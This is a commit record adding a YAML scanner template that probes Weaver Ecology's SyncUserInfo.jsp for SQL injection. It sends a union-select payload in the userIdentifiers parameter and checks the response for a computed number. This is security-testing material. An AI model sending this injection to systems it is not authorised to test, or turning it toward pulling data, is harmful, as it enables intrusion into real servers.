Merge pull request #4064 from ritikchaddha/patch-8

Create ecology-syncuserinfo-sqli.yaml
2022-04-07 19:27:52 +05:30 · 2022-04-07 19:27:52 +05:30 · 210d16392b
parent ff44256ee1 bb4358e498
commit 210d16392b
1 changed files with 27 additions and 0 deletions
--- a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml
+++ b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml
@ -0,0 +1,27 @@
+id: ecology-syncuserinfo-sqli
+info:
+  name: Ecology Syncuserinfo Sqli
+  author: ritikchaddha
+  severity: high
+  reference:
+    - https://www.weaver.com.cn/
+  tags: ecology,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "4386499557"
+
+      - type: status
+        status:
+          - 200